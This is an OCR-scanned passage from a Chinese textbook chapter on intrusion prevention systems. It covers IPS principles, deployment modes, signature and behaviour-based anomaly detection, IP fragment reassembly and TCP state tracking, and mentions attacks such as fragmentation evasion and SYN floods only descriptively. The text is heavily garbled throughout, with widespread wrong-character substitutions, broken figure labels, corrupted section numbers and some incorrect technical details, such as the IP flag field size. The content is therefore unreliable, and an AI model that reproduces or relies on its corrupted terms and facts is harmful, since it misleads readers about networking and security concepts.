侵 防御 系统 能 够 从 数据 流 中 检查 出 这 些 攻击 并 加 以 阻止 。 传 统 的 防火 墙 只 能 对 Layer3 
(网 络 层 ) 或 Layer4( 传 输 层 ) 进 行 检查 ,不 能 检查 应 用 层 的 内 容 。 防 火 墙 的 包 过 滤 技 术 不 
会 针对 每 个 字 节 进行 检查 ,因而 无 法 发 现 攻击 活动 ,而 入 侵 防御 系统 可 以 做 到 逐 字 节 地 检 
查 数 据 包 。 所 有 流 经 人 侵 防御 系统 的 数据 包 都 会 被 分 类 ,分 类 的 依据 是 数据 包 中 的 包头 
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图 3-3 入侵 防御 系统 的 工作 原理 


5 


言明 ,如 源 IP 地 址 和 目的 IP 地 址 .端口 号 和 应 用 域 。 每 种 过 滤 带 负责 分 析 对 应 的 数据 
包 。 通 过 检查 的 数据 包 可 以 继续 前 进 ,包含 恶意 内 容 的 数据 包 会 被 丢弃 ,被 怀疑 的 数据 包 
需要 接受 进一步 检查 。 

针对 不 同 的 攻击 行为 ,入 侵 防 御 系 统 需要 不 同 的 过 滤器 。 每 种 过 滤器 都 设 有 相应 的 
过 滤 规 则 ,为 确保 准确 性 ,这 一 规则 定义 十 分 广泛 。 在 对 传输 内 容 进行 分 类 时 ,过 滤 引 擎 


还 需要 参照 数据 包 的 信息 参数 ,将 其 解析 至 一 个 有 意义 的 域 中 进行 上 下 文 分 析 , 以 提高 过 
滤 的 准确 性 。 


过 滤 洁 引 革 集合 了 流水 和 大 规 梗 并 行 处 理 使 件 ,能 够 同时 执行 数 干 次 的 数据 包 过 滤 
检查 。 并 行 过 滤 处 理 可 确 你 数据 包 能 不 断 地 快速 通过 系统 。 这 种 人 硬件 加 速 技术 对 于 人 侵 
防御 系统 具有 重要 意义 ,因为 传统 的 软件 解决 方案 必须 串 行 进行 过 滤 检 查 ,会 寻 致 系统 的 
性 能 大 打折 扣 。 

入侵 防御 系统 虽然 在 荣 些 方面 和 防火 场 有 相似 之 处 ,但 它 却 是 一 种 将 审计 和 访问 摊 
制 相 融合 的 安全 技术 。 普 过 采用 的 防火 场 技 术 是 基于 七 层 网 络 协 议 层 第 三 层 的 路 由 访问 
控制 ,是 串联 在 网 络 中 的 。 入 侵 检测 系统 则 通过 并 联 在 网 络 中 进行 网 络 监控 和 审核 跟踪 
评 信 系 统 面临 的 危险 ,而 且 一 方面 及 用 与 防火 墙 类 似 的 过 渡 技 术 , 也 是 串联 在 网 络 中 的 ， 
机 征 它 不 仅 工作 在 网 络 层 ， ee . 层 到 第 七 层 的 细 粒 度 深 层 防 御 , 因 

能 够 实现 比 防 火 墙 更 细 粒 讶 的 访问 控制 。 为 一 方面 ,采用 基于 对 应 用 层 数据 内 容 与 数 
ep 习 传 统 的 基于 寞 第 行为 特征 库 的 匹配 检 
测 方 法 不 同 ,同时 检测 正常 与 寞 第 两 类 行为 ,并 且 不 仅 检 测 单 包 的 行为 ,更 重要 的 是 检测 
基于 尝 的 行为 系统 ,实现 了 将 传统 的 两 大 网 络 安全 技术 -访问 控制 技术 和 分 析 检 测 技术 统 
一 在 一 个 完整 的 系统 里 ,形成 了 一 个 密切 联系 的 蛇 厢 合 系统 ,避免 了 与 防火 墙 隐 动 解决 安 
全 问题 时 产生 的 通信 效率 低 ,日 身 安全 性 差 的 问题 ,从 而 可 以 实现 对 网 络 流量 进行 实时 放 
行 或 搓 戳 控制 ,将 传统 的 静态 访问 控制 发 展 为 动态 的 访问 控制 ， 并 可 以 实现 更 高 的 效率 和 
更 高 的 安全 性 。 系 统 将 访问 控制 和 分 析 检 测 功 能 么 和 不合 在 一 个 系统 里 ,在 实践 上 实现 了 
动态 网 络 安全 模型 的 防护 ,检测 和 啊 应 的 有 机 统一 ,进一步 提高 了 网 络 防护 的 智能 性 和 主 
动 性 。 

95 


入 侵 检测 与 入 侵 防御 


332 入 侵 防 御 系 统 的 部 署 

IPS 主要 用 于 一 些 重要 服务 占 的 入 侵 威 胁 防护 ,如 用 它 保护 OA 系统 、EPR 系统 、 数 
据 库 、 FTP 服务 融 、Web 网 站 等 。IPS 在 部 署 时 应 该 首先 保护 重要 设备 ,而 不 是 先 保护 所 
有 的 设备 。 当 然 , 如 果 是 小 型 办 公 网 络 ,也 可 以 部 署 在 网 络 前 端 用 它 保护 所 有 服务 器 和 办 


公 终 端 。 
IPS 有 两 种 部 署 方式 : 串联 与 并 联 。 
IPS 串联 部 署 ， 


(1) 针对 所 有 传输 数据 可 以 实时 监控 ,并 可 以 立即 阻 断 各 种 隐蔽 攻击 ,如 SQL 注入 、 
劳 路 注入 .脚本 攻击 、` 反 回 连接 木马 .时 虫 病毒 等 。 

(2) 串联 的 IPS 还 具有 内 网 管理 功能 ,对 上 网 行为 进行 管理 ,如 禁止 QQ MSN 等 网 
上 聊天 软件 ,禁止 或 限制 网 上 看 电影 ,禁止 或 限制 P2P 下载, 禁止 或 限制 在 线 游戏 等 。 

(3) 串联 的 IPS 一旦 死机 ,采用 硬件 Bypass 功能 立即 开启 网 络 全 通 功能 , 才 不 会 影 
啊 网 络 使 用 ,不 会 造成 网 络 中 断 。 

IPS 并 联 部 署 ， 

(1) 设备 不 会 对 网 络 传 输 形 成 翘 贷 ,一 旦 设备 死机 ,不 会 中 断 网 络 。 

(2) 可 以 监控 网 络 传输 的 所 有 数据 ,并 分 析 数 据 、 安 全 审计 。 


3.4 ， 入侵 防御 系统 的 大 键 技术 


入 侵 防 御 系 统 是 能 够 识别 对 计算 机 或 者 网 络 资 源 的 恶意 企图 和 行为 ,并 对 这 些 网 络 
担 贷 实时 的 入 侵 检 测 ,以 及 采取 相应 防护 的 一 种 积极 主动 的 入 侵 防 护 。 入 侵 防 御 系 统 需 
要 搜集 网 络 上 的 数据 流量 信息 ,并 根据 这 些 信 息 进 行 统计 、` 识 别 。 再 基于 这 些 统计 、 识 别 
的 内 容 采 取 相 应 的 识别 手段 。 目 前 ,基于 统计 和 识别 网 络 上 异常 流量 的 技术 手段 有 基于 
特征 的 寞 第 检测 和 基于 行为 的 寞 第 检测 。 


1 基于 特征 的 异常 检测 

基于 特征 的 异常 检测 是 根据 已 经 定义 好 的 攻击 特征 表述 ,对 网 络 上 的 数据 流量 信 生 
进行 分 析 , 当 收集 的 信息 与 该 攻击 特征 描述 相符 时 , 则 认为 发 生 了 和 人 入侵 行为 。 这 一 检测 假 
设 人 侵 者 活动 可 以 用 某 种 模式 特征 表示 ,系统 的 目标 是 检测 主体 活动 是 否 符 合 这 种 模式 
特征 。 该 方法 的 一 大 优点 是 : 只 需 收 集 相 关 的 数据 集合 并 依据 具体 特征 库 进 行 判 断 , 显 
着 减少 了 系统 负担 ,是 技术 已 相当 成 熟 。 它 与 病毒 防火 墙 灯 用 的 方法 类 似 , 检 测 准 确 率 和 
效率 都 相当 高 。 但 是 ,该 方法 存在 的 弱点 在 于 ,与 具体 系统 依赖 性 太 强 ,系统 移植 性 不 好 ， 
且 不 能 检测 到 从 未 出 现 过 的 黑客 攻击 手段 ,需要 不 断 升 级 ,以 对 付 新 出 现 的 人 侵 手 段 。 如 
末 可 以 定义 所 有 的 不 可 接 有 党 行为 ,那么 每 种 能 够 与 之 匹配 的 行为 都 会 引起 各 车 。 收 集 非 
正常 操作 的 行为 特征 ,建立 相关 的 特征 库 , 当 监测 的 用 户 或 系统 行为 与 库 中 的 记录 匹配 
时 ,系统 就 认为 这 种 行为 是 入 侵 。 这 种 检测 模型 虽然 误 报 率 低 ,但 是 汤 报 广电 。 对 于 已 知 
的 攻击 , 它 可 以 详细 ,准确 地 报告 出 攻击 类 型 ,但 是 对 未 知 攻击 却 效 果 有 限 , 而 且 特 征 库 必 
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须 不 断 更 新 。 该 方法 是 目前 主流 的 实现 手段 ,安全 模型 比较 容易 建立 。 


2 基于 行为 的 异 钊 检测 

基于 行为 的 异常 检测 的 前 提 是 人 侵 活动 发 生 时 ,其 行为 活动 与 正常 的 网 络 活动 存在 
异常 ,因此 根据 这 个 理论 须 建立 一 个 正常 活动 行为 的 模型 , 当 发 生 的 行为 与 该 模型 规律 相 
反 时 , 则 认为 是 入 侵 活动 。 若 可 以 定义 每 项 可 接受 的 行为, 则 每 项 不 可 接受 的 行为 就 应 该 
是 人 侵 。 首 先 总 结 正常 操作 应 具有 的 特征 用 户 轮廓, 当 用 户 活动 与 正常 行为 有 重大 偏离 
时 即 被 认为 是 入 侵 。 这 种 检测 模型 虽然 湄 报 率 低 , 但 误 报 率 高 。 因 为 不 需要 对 每 种 入 候 
行为 进行 定义 ,所 以 能 有 效 检测 未 知 的 入侵 。 用 户 行为 表现 为 可 预测 的 ,一致 的 系统 使 用 
模式 ,而 入 侵 者 活动 异常 于 正常 用 户 的 活动 。 根 据 这 一 理念 建立 用 户 正常 活动 的 “行为 模 
型 "。 进 行 检测 时 ,将 使 用 者 的 行为 或 资源 使 用 状况 与 “行为 模型 ? 相 比较 ,从 而 判断 该 活 
动 是 否 是 入 侵 行为 。 例 如 ,事先 定义 一 组 系统 “正常 "情况 的 阔 值 ,如 利用 率 、. 内 存 利用 率 、 
特定 类 型 的 网 络 连接 数 . 访 问 文件 或 目录 次 数 .不 成 功 注册 次 数 等 ,这 类 数据 可 人 为 定义 ， 
也 可 通过 观察 系统 并 用 统计 的 办 法 得 出 ,然后 将 系统 运行 时 的 数值 与 所 定义 的 “正常 ” 情 
况 比较 ,得 出 是 否 有 被 攻击 的 迹象 。 异 常 检测 与 系统 相对 无 关 , 通 用 性 较 强 , 它 甚至 有 可 
能 检测 出 以 前 未 出 现 过 的 攻击 方法 。 异 常 检测 的 关键 在 于 如 何 建立 “行为 模型 "以 及 如 何 
设计 检测 算法 降低 过 高 的 误 检 率 ,因为 不 可 能 对 整个 系统 内 的 所 有 用 户 行为 进行 全 面 的 
描述 ,况且 每 个 用 户 的 行为 是 经 常 改变 的 ,尤其 在 用 户 数目 众多 或 工作 目的 经 常 改变 的 环 
境 中 。 该 方法 能 检测 出 未 知 攻击 ,但 基于 行为 的 异常 检测 模型 难以 建立 ,需要 有 相关 经 验 
的 人 制定 ,这 是 未 来 发 展 的 一 个 方向 ， 
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和 人 侵 防 御 系 统一 般 是 作为 一 个 独立 的 个 体 部 署 在 被 保护 网 络 的 出 人 口 位 置 上 , 它 使 
用 原始 的 网 络 数据 报 文 作 为 攻击 分 析 的 数据 源 。 

入 侵 防 御 系统 在 线 连接 在 需要 检测 的 网 络 链 路 中 ,对 接口 上 接收 到 的 网 络 数据 包 , 首 
先 分 析 链 路 层 .网 络 层 .传输 层 和 应 用 层 协议 ,根据 不 同 的 协议 类 型 检测 特征 值 ,同时 判断 
是 否 为 异常 协议 类 型 。 然 后 将 每 个 数据 包 与 模式 匹配 规则 库 中 的 规则 或 建立 好 的 安全 模 
式 进 行 匹 配 ,判断 该 数据 包 是 否 为 攻击 数据 包 , 如 果 该 数据 包 是 攻击 数据 包 , 则 丢弃 该 数 
据 包 ,否则 进行 IP 分 片 重组 (重组 后 进行 更 深层 次 的 检测 ) ,同时 转发 该 数据 包 。 

不 同 的 协议 类 型 匹配 不 同 的 检测 特征 或 者 安全 模型 ,也 就 意味 着 人 侵 防 御 系 统 中 会 
包含 不 同类 型 的 过 滤 兰 ,通过 层 层 过 滤 进 行 攻 击 检测 ,并 加 以 阻止 。 因 此 ,入 侵 防 御 系 统 
首先 需要 做 的 就 是 对 数据 包 进 行 解析 。 数 据 包 解 析 基 本 过 程 如 图 3-4 所 示 。 

接收 数据 包 时 ,通过 网 卡 驱动 程序 收集 网 络 上 的 数据 包 。 数 据 收 取 上 来 后 ,进入 入 侵 
防御 系统 的 解码 带 , 人 解码 融 站 先 根据 以 太 网 首部 中 的 上 层 协议 字段 确定 该 数据 包 的 有 效 
负载 ,确定 获得 的 是 IP、ARP, 还 是 RARP 数据 包 , 然 后 交 给 相应 的 协议 解码 需 进 行 下 一 
层 解 码 。 

以 IP 数据 包 为 例 ,IP 解码 磊 解 析 IP 首部 内 容 , 确 定 从 首部 中 获得 的 上 层 协 议 是 
TCP .UDP ICMP ,还 是 IGMP。 然 后 再 根据 不 同 的 协议 选择 解码 硕 。 如 果 是 TCP, 则 解 
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应 用 层 首部 以 太 网 规则 库 
TCP/UDP 香 部 应 用 层 首 部 以 太 网 规则 库 


IP 首 部 TCP 首 部 | 应 用 层 首部 以 太 网 规则 库 


以 太 网 首部 ”IP 首 部” TCP 首部 ”应 用 层 首部 ”以 太 网 尾部 以 太 网 规则 库 


3-4 数据 包 解析 基本 过 程 


析 TCP 首部 内 容 , 并 根据 TCP 首部 中 端口 .协议 识别 等 ,确定 应 用 层 数据 是 什么 协议 ,再 
解析 应 用 层 协议 的 数据 。 

进行 解析 的 同时 ,也 会 根据 不 同 的 协议 选择 不 同 的 规则 库 和 安全 模型 ,对 这 些 数据 包 
进行 过 滤 ,确定 该 数据 包 是 否 阻 断 或 者 转发 。 

解析 数据 包 时 ,由 于 以 太 网 中 数据 的 最 大 长 度 是 确定 的 ,所 以 IP 数据 包 会 进行 分 片 ， 
并 且 大 部 分 应 用 使 用 TCP 或 者 UDP 进行 传输 时 ,会 将 数据 分 为 多 个 数据 包 , 而 且 由 于 网 
络 传输 时 路 径 延 时 等 原因 ,数据 包 到 达 的 时 间 可 能 不 一 致 ,因此 入 侵 防 御 系 统 还 需要 按照 
待定 顺序 对 数据 包 的 内 容 进 行 重组 ,还 原 应 用 层 数据 。 
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IP 分 片 是 网 络 上 传输 IP 报 文 的 一 种 技术 手段 。IP 在 传输 数据 包 时 ,将 数据 报 文 分 
成 右 干 个 分 片 进行 传输 ,并且 在 目标 系统 中 进行 重组 ,这 一 过 程 称 为 分 片 。 

IP 首部 报 文 长 度 字 段 是 16 位 ,因此 可 以 支持 IP 数据 包 传 输 的 最 大 长 度 是 65536B， 
但 是 每 种 物理 网 络 都 会 规定 链 路 层 数 据 帧 的 最 大 长 度 , 称 为 链 路 层 最 大 传输 单元 (Maxi- 
mum Transmission Unit, MTU)。 任何 时 候 IP 层 接收 到 一 份 要 发 送 的 IP 数据 包 时 ,都 
要 判断 问 本 地 哪个 接口 发 送 数据 ( 选 路 ) ,并 查询 该 接口 获得 其 MTU。IP 把 MTU 与 数 
据 包 长 度 进 行 比较 ,如 果 需 要 , 则 进行 分 片 。 分 片 可 以 发 生 在 原始 发 送 端 主机 上 ,也 可 以 
发 生 在 中 间 路 由 如 上 。IP 报 文 长 度 不 能 超过 1500B,UDP 不 能 超过 1472B,TCP 不 能 超 
过 1460B。 例 如 ,应 用 进程 将 1473B 应 用 字段 交 给 UDP 处 理 ,UDP 加 上 8B 的 UDP 报头 
后 ,区 给 IP 层 处 理 ,IP 层 在 转发 之 前 ,发 现 该 报 文 长 度 超出 转发 接口 的 MTU ,因此 需要 
分 片 ,分 为 两 个 IP 分 组 。IP 数据 报 示意 图 如 图 3-5 所 示 。 

IP 首部 中 与 分 片 相 关 的 字段 如 下 。 

标识 (Identification) 字 段 占 16 位 ,是 一 个 计数 器 , 用 来 产生 数据 包 的 标识 。 一 个 IP 
地 址 每 发 送 一 个 IP 报 文 时 标志 位 是 上 一 个 报 文 标志 位 加 一 ,来 目 同 一 个 IP 报 文 的 分 片 
具有 相同 的 ID。 

标志 (Flag) 占 32 位 ,目前 只 有 前 两 位 有 意义 。 标 志 字 段 的 最 低位 是 MF(More Frag- 
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IP 站 部 UDP 百 部 UDP 数据 报 (1473B) 


/ 7 更 人 -~ 
pe pe pa AN 
A \ 
4 / 1/ ee \ 
” ” pa a AN \ \ 
a i - a 和 本 \ 
IP 首 部 UDP 首部 1472B IP 首 部 ] 


图 3-5 JIP 数 据 报 示意 图 


ment) 。MF=1 表示 后 面 * 还 有 分 片 ”, MF 二 0 表示 最 后 一 个 分 片 。 标 志 字 段 中 间 的 一 位 
是 DF(Don't Fragment), 只 有 当 DF=0 时 , 才 人 允许 分 片 。 

偏 移 位 占 12 位 , 偶 移 位 的 作用 是 指出 较 长 的 分 组 分 片 后 某 片 在 原 分 组 中 的 相对 位 
置 , 片 偏 移 以 8B 为 偏 移 单位 。 

IP 分 片 示 意图 如 图 3-6 所 示 。 对 于 长 度 超过 1500B 的 卫 了 报 文 ,IP 层 会 将 其 分 片 分 
成 厂 干 长 度 不 超过 1500B 的 IP 报 文 (分 片 ) 传 递 。 从 源 报 文 的 UDP 头 部 开始 将 源 报 文 
数据 段 以 1480B 为 单位 依次 分 片 ,直到 最 后 不 足 1480B 时 为 最 后 一 个 分 片 。 每 个 分 片 的 
段 偏 移 为 该 片 第 一 个 8B 在 源 IP 报 文 数据 段 中 以 8B 为 单位 的 偏 移 。 这 些 分 片 中 只 有 第 
一 个 分 片 具有 源 报 文 的 UDP 头 部 ,其 余 报 文 的 IP 数据 字段 为 源 报 文 的 用 户 数据 。 所 有 
分 片 IP 头 部 和 源 IP 报 文 一 样 。 


数据 部 分 共 3800 字 市 


偏 移 =0/8 
0 


需要 分 片 的 数据 报 


z 由 、 ' 
1400 2800\、 3799 、、 
| 


字 节 0 1399 1400 2799 2800 3799 
数据 报 1 数据 报 2 数据 报 3 
偏 移 =0/8=0 偏 移 =1400/8=175 偏 移 =2800/8=350 


图 3-6 ”了 IP 分 片 示意 图 


攻击 者 通过 分 片 的 方式 ,将 带 有 攻击 内 容 的 数据 包 分 片 后 进行 传输 ,通过 不 同 的 路 由 
选择 等 方式 可 以 达到 绕 过 的 效果 。 分 片 增加 了 入 侵 防御 系统 的 检测 难度 ,是 目前 攻击 者 
绕 过 攻击 的 普通 手段 。 攻 击 者 利用 IP 分 片 的 原理 ,往往 会 使 用 分 片 数据 包 转 发 工具 (如 
Fragroute) ,将 攻击 请 求 分 成 若干 IP 分 片 包 发 送 给 目标 主机 ;目标 主机 接收 到 分 片 包 后 ， 
进行 分 片 重组 还 原 出 真正 的 请 求 。 分 片 攻击 包括 分 片 覆盖 、 分 片 重 写 、 分 片 超时 和 针对 网 


2 


络 拓扑 的 分 片 技术 等 。 
所 以 ,入 侵 防御 系统 需要 在 内 存 中 缓存 分 片 , 模 拟 目标 主机 对 网 络 上 传输 的 分 片 包 进 
行 重组 ,还 原 出 真正 的 请 求 内 容 ,然后 再 进行 分 析 , 具 体 流程 如 图 3-7 所 示 。 


路 由 从 路 由 加 


fragmentl | datal | fragmenti / 
data2 | | | 
Ee fe | 
data3 | | 


Ee Teen 


dataV 


fraementN | fragmentN | | 


图 3-7 IPS 分 片 重组 示意 图 


进行 重组 时 ,其 重组 原理 和 分 片 相反 。 如 果 一 个 包 的 段 偏 移 为 0, 而 Flag 字段 不 为 
1, 那 么 该 报 文 一 定 不 是 来 自 一 个 分 片 。 

对 于 接收 到 的 无 序 分 厂 ,来 自 同 一 个 包 的 分 厂 具 有 相同 的 源 IP 及 ID 号 。 

当 收 到 的 标志 位 为 0 的 分 片 时 ,说 明 这 是 最 后 一 个 分 片 。 根 据 最 后 一 个 分 片 的 段 偏 
移 可 以 知道 在 源 报 文中 最 后 一 个 分 片 以 前 含有 的 数据 长 度 , 再 加 上 最 后 一 个 分 片 的 数据 
长 度 即 为 源 IP 报 文 数据 部 分 的 长 度 。 如 果 接 收 到 的 所 有 分 片 的 数据 长 度 等 于 源 IP 报 文 
数据 部 分 的 长 度 , 就 说 明 所 有 的 分 片 都 已 经 到 达 了 ,此 时 即 可 按照 段 偏 移 量 重新 组 包 ， 

校 验 到 达 包 时 , 除 第 一 个 分 片 外 ,其 余 分 片 没 有 UDP 头 部 ,因此 ,对 于 每 一 个 分 片 的 
校 验 是 不 方便 的 ,可 以 再 重组 所 有 的 分 片 ,之 后 构建 UDP 伪 头 部 校 验 。 

由 于 TCP 是 面 加 连接 的 可 靠 传 输 协议 ,发送 端 TCP 会 将 过 大 的 数据 采用 按 序 流 式 
方式 以 多 个 包 形 式 发 送 ,每 发 送 一 个 包 后 ,接收 到 接收 问 的 确认 信息 后 再 发 送 下 一 个 包 ， 
所 发 送 的 TCP 包 用 户 数据 不 超过 1460B ,接收 闪 TCP 收 到 所 有 数据 后 进行 重组 ,因此 
TCP 数据 不 会 在 IP 层 重组 ， 

343 TCP 状态 检测 拉 术 

TCP 是 基于 状态 的 传输 层 协 议 ,提供 面 回 连接 的 .可 菲 的 字 闻 流 服务 。 面 回 连接 意 
味 着 两 个 使 用 TCP 的 应 用 在 彼此 交换 数据 前 必须 建立 一 个 TCP 连接 ,这 一 过 程 与 打 电 
话 相似 , 先 拨 号 振 伶 ,等待 对 方 摘 机 说 “ 喂 ”, 然 后 才 说 明 身 份 。 无 论 哪 一方 癌 另 一 方 发 送 
数据 ,首先 都 必须 在 双方 之 间 建 立 一 条 连接 ,进行 三 次 握手 ， 
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人 侵 防 御 系 统 会 对 TCP 的 连接 状态 进行 检测 和 监控 ,不 同 的 状态 可 能 存在 不 同 的 攻 
击 方式 ,同时 还 会 对 应 用 内 容 进 行 数据 采集 和 特征 检测 。TCP 建立 连接 和 关闭 的 状态 变 
化 如 图 3-8 所 示 。 
客户 服务 顷 
主动 打开 SYN_SENT LISTEN 《被 动 打开 ) 


SYN_RCVD 


ESTABLISHED 


ESTABLISHED 
主动 关闭 FIN_WAIT_] 


CLOSED_WAIT 被 动 关闭 ) 


FIN WAIT 2 [LAT_AC 


TIME_WAIT 


ACK N+] 


CLOSED 


3-8 ”TCP 建立 连接 和 关闭 的 状态 变化 


图 3-8 中 包含 TCP 三 次 握手 的 过 程 ,以 及 入 侵 防御 系统 采集 TCP 传输 的 数据 内 容 的 过 
程 ,采集 数据 包 时 ,会 对 这 些 内 容 进行 重组 。 图 3-8 中 ,TCP 一 共有 10 种 状态 ,分 别 为 : 

CLOSED: 表示 关闭 状态 (初始 状态 )。 

LISTEN: 该 状态 表示 服务 右 端 的 某 个 SOCKET 处 于 监听 状态 ,可 以 接受 连接 。 

SYN_SENT: 这 个 状态 与 SYN_RCVD 台 相 呼应 , 当 客 户 端 SOCKET 执行 CON- 
NECT 连接 时 , 它 首 和 完 发 送 SYN 报 文 , 随 即 进 入 到 SYN_SENT 状态 ,并 等 待 服务 端的 发 
送 三 次 握手 中 的 第 2 个 报 文 。SYN_SENT 状态 表示 客户 端 已 发 送 SYN 报 文 。 

SYN_RCVD: 该 状态 表示 接收 到 SYN 报 文 , 正 稼 情 襄 下 ,这 个 状态 是 服务 硕 端 的 
SOCKET 在 建立 TCP 连接 时 的 三 次 握手 会 话 过 程 中 的 一 个 中 间 状 态 ,很 短暂 。 此 种 状 
仿 下 , 当 收 到 客户 端的 ACK 报 文 后 ,会 进入 到 ESTABLISHED 状态 。 

ESTABLISHED: 表示 连接 已 经 建立 。 

FIN_WAIT _ 1: FIN_WAIT 1 和 FIN_WAIT 2 状态 的 真正 含义 都 是 等 待 对 方 的 
FIN 报 文 。 区 别 是 ,FIN_WAIT 1 状态 是 当 SOCKET 在 ESTABLISHED 状态 时 , 想 主 
动 关闭 连接 , 回 对 方 发 送 了 FIN 报 文 , 此 时 该 SOCKET 进入 到 FIN_WAIT 1 状态 。FIN 
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_WAIT 2 状态 是 当 对 方 回应 ACK 后 ,该 SOCKET 进入 到 FIN_WAIT 2 状态 ,正常 情 
况 下 ,对 方 应 马上 回应 ACK 报 文 ,所 以 FIN WAIT 1 状态 一 般 较 难 见 到 ,而 FIN_WAIT 
_2 状态 可 用 netstat 看 到 。 

FIN_WAIT_2: 主动 关闭 链接 的 一 方 , 发 出 FIN 收 到 ACK 后 进入 该 状态 , 通 第 称 为 
半 连 接 或 半 关 闭 状态 。 该 状态 下 的 SOCKET 只 能 接收 数据 ,不 能 发 送 数据 。 

TIME_WAIT: 表示 收 到 了 对 方 的 FIN 报 文 ,并 发 送出 了 ACK 报 文 ,等 待 两 个 报 文 
最 大 生存 时 间 (Maximum Segment Lifetime,; MSL) 后 即 可 回 到 CLOSED 可 用 状态 。 如 
果 在 FIN_WAIT 1 状态 下 , 收 到 对 方 同 时 带 FIN 标志 和 ACK 标志 的 报 文 时 ,可 以 直接 
进入 TIME_WAIT 状态 ,无 须 经 过 FIN_WAIT_2 状态 。 

CLOSE_WAIT: 此 种 状态 表示 在 等 待 关闭 。 当 对 方 关闭 一 个 SOCKET 后 发 送 FIN 
报 文 , 系 统 会 回应 一 个 ACK 报 文 给 对 方 ,此 时 则 进入 到 CLOSE_WAIT 状态 。 查 看 是 否 
还 有 数据 发 送 给 对 方 , 如 宁 没 有 , 则 可 以 关闭 这 个 SOCKET ,发 送 FIN 报 文 给 对 方 , 即 关 
闭 连接 。 所 以 ,在 CLOSE WAIT 状态 下 需要 关闭 连接 。 

LAST_ACK: 该 状态 是 被 动 关闭 一 方 在 发 送 FIN 报 文 后 ,最 后 等 待 对方 的 ACK 报 
文 。 收 到 ACK 报 文 后 , 即 可 进入 到 CLOSED 可 用 状态 。 

下 面 对 TCP 连接 建立 和 关闭 的 状态 变化 进行 介绍 。 

1 建立 人 CP 连接 

在 TCP/IP 中 ,由 于 了 TCP 提供 可 靠 的 连接 服务 ,于 是 采用 有 保障 的 三 次 握手 创建 一 
个 TCP 连接 。 三 次 握手 的 具体 过 程 如 下 。 

(1) 客户 将 发 送 一 个 市 SYN 标志 的 TCP 报 文 ( 报 文 1) 到 服务 硕 ,表示 和 硕 望 和 服务 天 
建立 一 个 TCP 连接 。 

(2) 服务 器 发 送 一 个 带 有 ACK 标志 和 SYN 标志 的 TCP 报 文 ( 报 文 2) 给 客户 端 ， 
ACK 用 于 对 报 文 1 进行 回应 ,SYN 用 于 询问 客户 并 是 否 准 备 好 进行 数据 传输 。 

(3) 客户 站 发 送 一 个 市 有 ACK 标志 的 TCP 报 文 ( 报 文 3) ,作为 对 报 文 2 的 回应 。 

至 此 ,一 个 TCP 连接 建立 完成 。 

2 断 开 IP 连接 

由 于 TCP 连接 是 全 双 工 的 ,因此 每 个 方向 都 必须 单独 进行 关闭 。 原 则 是 主动 关闭 的 
一 方 (如 已 经 传输 完 所 有 数据 等 原因 ) 发 送 一 个 FIN 报 文 表示 需要 终止 这 个 方向 的 连接 ， 
接收 到 一 个 FIN 意味 看 这 个 方向 不 再 有 效 据 传输 ,但 是 另 一 个 方 回 依旧 能 够 发 送 数据 ， 
直到 另 一 个 方 问 也 发 送 FIN 报 文 。 四 次 挥手 的 具体 过 程 如 下 。 

(1) 客户 六 发 送 一 个 FIN 报 文 ( 报 文 4) 给 服务 需 , 表 示 将 关闭 客户 端 到 服务 硕 的 连接 。 

(2) 服务 器 接收 到 报 文 4 后 ,发 送 一 个 ACK 报 文 ( 报 文 5) 给 客户 端 ,序号 为 报 文 4 的 
序号 加 1。 

(3) 服务 器 发 送 一 个 FIN 报 文 ( 报 文 6) 给 客户 端 ,表示 自己 也 将 关闭 服务 器 端的 
(4) 客户 端 接收 到 报 文 6 后 ,发 回 一 个 ACK 报 文 ( 报 文 7) 给 服务 器 ,序号 为 报 文 6 的 

序号 加 1 。 
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至 此 ,一 个 TCP 连接 束 关 闭 了 ，。 

其 中 ,状态 从 ESTABLISHED( 三 次 担 手 ) 之 后 到 四 次 挥手 完成 ,中 间 会 对 正 反 回流 
量 的 数据 包 进 行 采 集 , 并 对 其 进行 重组 ,同时 监控 TCP 的 状态 ,不 同 的 状态 可 能 包含 不 同 
的 攻击 特征 ,因此 , 当 TCP 的 某 个 状态 发 生 时 ,需要 对 其 进行 检测 。 

例如 ,一 些 攻击 者 不 进行 三 次 握手 。 序 列 号 不 正确 的 报 文 发 送 给 入 侵 防 御 系 统 
(SYN Flood 攻击 ,攻击 者 伪造 一 定量 的 客户 端 , 对 服务 需 发 起 TCP 连接 ,服务 需 收 到 
SYN 报 文 后 ,会 回复 SYN 十 ACK ,此 时 攻击 者 不 回应 ACK 报 文 ,由 于 三 次 握手 没有 正常 
建立 ,在 一 定时 间 内 ,服务 需 将 会 等 待 客户 端的 ACK 回应 报 文 ,等 待 期 间 需 要 占用 系统 
资源 , 当 数 量 达到 一 定量 时 , 驶 会 导致 后 续 的 请 求 不 能 得 到 正 稼 回应 ,从 而 占用 系统 资 
源 ) ,这些 报 文 市 有 攻击 特征 ,甚至 有 可 能 有 多 个 攻击 特征 ,所 以 入 侵 防御 系统 在 匹配 这 些 
数据 包 的 信息 时 ,就 会 频繁 进行 告警 ,降低 了 系统 的 性 能 并 产生 误 报 。 通 过 对 TCP 状态 
的 检测 ,没有 经 过 三 次 握手 的 报 文 属于 非法 报 文 , 可 以 直接 丢弃 ,无 须 进 入 特征 的 模式 匹 
配 ,这 样 可 以 完全 避免 因 单 包 匹 配 造成 的 误 报 并 提升 效率 。 

基于 状态 检测 的 TCP 数据 采集 及 检测 如 图 3-9 所 示 。 

客户 服务 器 


IPS 数 
据 采 集 
及 检测 


一 一 一 一 - 正常 交互 流程 
一 一 一 ”状态 异常 报 文 交互 流程 
图 3-9 ”基于 状态 检测 的 TCP 数据 采集 及 检测 
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344 TP 流 重组 技术 


TCP 使 用 网 络 层 进行 通信 ,通过 重 传 机 制 可 以 确保 数据 准确 到 达 , 如 采 在 一 定时 间 
内 没有 收 到 接收 方 的 啊 应 信息 ,发 送 方 会 日 动 重 传 数据 。 

既然 TCP 报 文 段 作 为 IP 数据 报 传输 ,由 于 网 络 问题 ,数据 包 可 能 会 经 过 不 同 的 路 由 
传输 到 达 目 的 地 ,IP 数据 报 的 到 达 可 能 会 失 序 ,因此 TCP 报 文 段 的 到 达 也 可 能 是 失 打 
的 。 如 来 有 必要 ,TCP 将 对 收 到 的 数据 重新 排序 ,将 收 到 的 数据 以 正确 的 顺序 交 给 应 
用 层 。 

前 文 已 经 提 到 过 ,通过 分 片 可 以 达到 “ 绕 过 ”的 效 末 ,TCP 如 末 不 进行 重组 ,同样 也 可 
以 达到 颖 过 的 歼 末 。 入 侵 防御 系统 为 了 更 加 精确 地 进行 检测 和 防护 ,必须 将 TCP 数据 包 
